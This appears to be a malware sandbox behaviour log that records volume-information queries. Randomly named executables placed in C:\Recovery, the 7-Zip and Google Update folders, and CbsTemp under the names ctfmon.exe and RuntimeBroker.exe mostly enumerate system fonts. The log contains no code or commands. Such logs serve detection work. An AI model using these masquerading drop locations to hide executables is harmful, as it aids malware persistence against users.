Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\CbsTemp\ctfmon.exe	Queries volume information: C:\Windows\CbsTemp\ctfmon.exe VolumeInformation
Source: C:\Windows\CbsTemp\ctfmon.exe	Queries volume information: C:\Windows\CbsTemp\ctfmon.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Queries volume information: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe VolumeInformation
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Queries volume information: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Recovery\opHipgZM6eS.exe VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Recovery\opHipgZM6eS.exe VolumeInformation
Source: C:\Recovery\RuntimeBroker.exe	Queries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
Source: C:\Recovery\RuntimeBroker.exe	Queries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Queries volume information: C:\Users\user\Desktop\SfbAu0ICZn.exe VolumeInformation
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Queries volume information: C:\Users\user\Desktop\SfbAu0ICZn.exe VolumeInformation
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Queries volume information: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe VolumeInformation
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Queries volume information: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Recovery\opHipgZM6eS.exe VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Recovery\opHipgZM6eS.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
